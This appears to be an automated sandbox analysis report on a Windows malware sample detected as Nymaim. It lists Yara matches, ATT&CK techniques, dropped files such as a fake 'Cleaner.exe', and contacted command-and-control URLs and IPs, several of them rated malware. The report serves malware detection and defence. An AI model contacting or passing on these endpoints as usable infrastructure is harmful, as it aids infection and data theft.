                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Amcache.hve.30.drBinary or memory string: c:\users\user\desktop\procexp.exe
                Source: Amcache.hve.30.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.30.drBinary or memory string: procexp.exe

                Stealing of Sensitive Information

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 0.3.file.exe.2210000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.22.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.14.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.28.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.24.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.20.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.32.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.28.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.32.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.20.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.26.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.26.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.24.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.14.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.30.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.18.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.30.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.18.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.2210000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.file.exe.710e67.22.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.292406498.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.307333691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.285914510.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.265875582.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.254096635.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.293499241.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.299464336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.260403586.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.270306154.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.271549614.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.261149123.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.265067890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.280355467.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.300281036.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.254941692.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.306082555.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.253262177.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management InstrumentationPath Interception12
                Process Injection                		11
                Masquerading                		OS Credential Dumping121
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium11
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
                Virtualization/Sandbox Evasion                		Security Account Manager21
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
                Process Injection                		NTDS1
                Remote System Discovery                		Distributed Component Object ModelInput CaptureScheduled Transfer123
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Obfuscated Files or Information                		LSA Secrets1
                System Network Configuration Discovery                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common2
                Software Packing                		Cached Domain Credentials1
                File and Directory Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Timestomp                		DCSync13
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 715150 Sample: file.exe Startdate: 03/10/2022 Architecture: WINDOWS Score: 100 54 Multi AV Scanner detection for domain / URL 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus detection for URL or domain 2->58 60 6 other signatures 2->60 7 file.exe 29 2->7         started        process3 dnsIp4 48 208.67.104.97, 49713, 49727, 80 GRAYSON-COLLIN-COMMUNICATIONSUS United States 7->48 50 85.31.46.167, 49714, 80 CLOUDCOMPUTINGDE Germany 7->50 52 2 other IPs or domains 7->52 26 C:\Users\user\AppData\Local\...\Cleaner.exe, PE32 7->26 dropped 28 C:\Users\user\...\Bunifu_UI_v1.5.3.dll, PE32 7->28 dropped 30 C:\Users\user\AppData\Local\...\dll[1], PE32 7->30 dropped 32 C:\Users\user\AppData\Local\...\soft[1], PE32 7->32 dropped 11 cmd.exe 1 7->11         started        13 WerFault.exe 9 7->13         started        16 WerFault.exe 9 7->16         started        18 8 other processes 7->18 file5 process6 file7 20 Cleaner.exe 17 2 11->20         started        24 conhost.exe 11->24         started        34 C:\ProgramData\Microsoft\...\Report.wer, Unicode 13->34 dropped 36 C:\ProgramData\Microsoft\...\Report.wer, Unicode 16->36 dropped 38 C:\ProgramData\Microsoft\...\Report.wer, Unicode 18->38 dropped 40 C:\ProgramData\Microsoft\...\Report.wer, Unicode 18->40 dropped 42 C:\ProgramData\Microsoft\...\Report.wer, Unicode 18->42 dropped 44 5 other malicious files 18->44 dropped process8 dnsIp9 46 iplogger.org 148.251.234.83, 443, 49723 HETZNER-ASDE Germany 20->46 62 May check the online IP address of the machine 20->62 signatures10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe48%ReversingLabsWin32.Trojan.CrypterX
                file.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1]29%ReversingLabsWin32.Trojan.Lazy
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1]0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1]0%MetadefenderBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte100%URL Reputationmalware
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                https://take.rdrct-now.online/go/ZWKA?p78705p298845p11740%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte100%URL Reputationmalware
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://107.182.129.235/storage/ping.php0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                http://www.agfamonotype.0%URL Reputationsafe
                http://107.182.129.235/storage/extension.php0%URL Reputationsafe
                http://85.31.46.167/software.php0%URL Reputationsafe
                http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst100%URL Reputationmalware
                http://85.31.46.167/software.phpll0%Avira URL Cloudsafe
                http://85.31.46.167/software.phpZ0%Avira URL Cloudsafe
                http://en.w0%URL Reputationsafe
                https://iplogger.orgx0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://85.31.46.167/software.phpll1%VirustotalBrowse
                http://85.31.46.167/software.phpP0%Avira URL Cloudsafe
                https://g-cleanit.hk0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://85.31.46.167/software.phpO0%Avira URL Cloudsafe
                http://171.22.30.106/library.php100%URL Reputationmalware
                http://85.31.46.167/software.phpx0%Avira URL Cloudsafe
                http://85.31.46.167/software.phpstem320%Avira URL Cloudsafe
                http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p11740%Avira URL Cloudsafe
                http://85.31.46.167/software.phpZ6%VirustotalBrowse
                http://85.31.46.167/software.php$0%Avira URL Cloudsafe
                http://85.31.46.167/software.phpCoo0%Avira URL Cloudsafe
                http://85.31.46.167/software.phpl0%Avira URL Cloudsafe
                http://www.ascendercorp.com/typedesigners.htmled.0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                iplogger.org
                		148.251.234.83
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixintetrue
                  • URL Reputation: malware
                  		unknown
                  http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixintetrue
                  • URL Reputation: malware
                  		unknown
                  http://107.182.129.235/storage/ping.phpfalse
                  • URL Reputation: safe
                  		unknown
                  http://107.182.129.235/storage/extension.phpfalse
                  • URL Reputation: safe
                  		unknown
                  http://85.31.46.167/software.phptrue
                  • URL Reputation: safe
                  		unknown
                  https://iplogger.org/1Pz8p7false
                    		high
                    http://171.22.30.106/library.phptrue
                    • URL Reputation: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.fontbureau.com/designersGCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://85.31.46.167/software.phpllfile.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.tiro.comCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersCleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://www.goodfont.co.krCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.comCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cn/cTheCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/staff/dennis.htmCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://fontfabrik.comCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersrsivoCleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405489220.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.409086991.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405791697.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersersCleaner.exe, 00000021.00000003.391186193.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://85.31.46.167/software.phpZfile.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • 6%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.galapagosdesign.com/DPleaseCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fonts.comCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.sandoll.co.krCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.urwpp.deDPleaseCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.zhongyicts.com.cnCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designerspCleaner.exe, 00000021.00000003.391552464.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sakkal.comCleaner.exe, 00000021.00000003.387130957.0000024B7E1C3000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://85.31.46.167/software.phpPfile.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://85.31.46.167/software.phpOfile.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0Cleaner.exe, 00000021.00000003.382564725.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.comCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.agfamonotype.Cleaner.exe, 00000021.00000003.396394419.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395554408.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.396105393.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395852274.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://85.31.46.167/software.phpxfile.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://upx.sf.netAmcache.hve.30.drfalse
                                            		high
                                            http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substfile.exe, 00000000.00000000.306032693.000000000019B000.00000004.00000010.00020000.00000000.sdmptrue
                                            • URL Reputation: malware
                                            		unknown
                                            http://85.31.46.167/software.phpstem32file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://iplogger.orgCleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://en.wCleaner.exe, 00000021.00000003.379618679.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.378593000.0000024B7E185000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.383731927.0000024B7E1C4000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.379712996.0000024B7E18F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.ascendercorp.com/typedesigners.htmled.Cleaner.exe, 00000021.00000003.387478626.0000024B7E190000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.387275120.0000024B7E190000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://iplogger.orgxCleaner.exe, 00000021.00000002.645456817.0000024B0040E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://85.31.46.167/software.phplfile.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.carterandcone.comlCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://iplogger.orgCleaner.exe, 00000021.00000002.645497591.0000024B00418000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cnCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
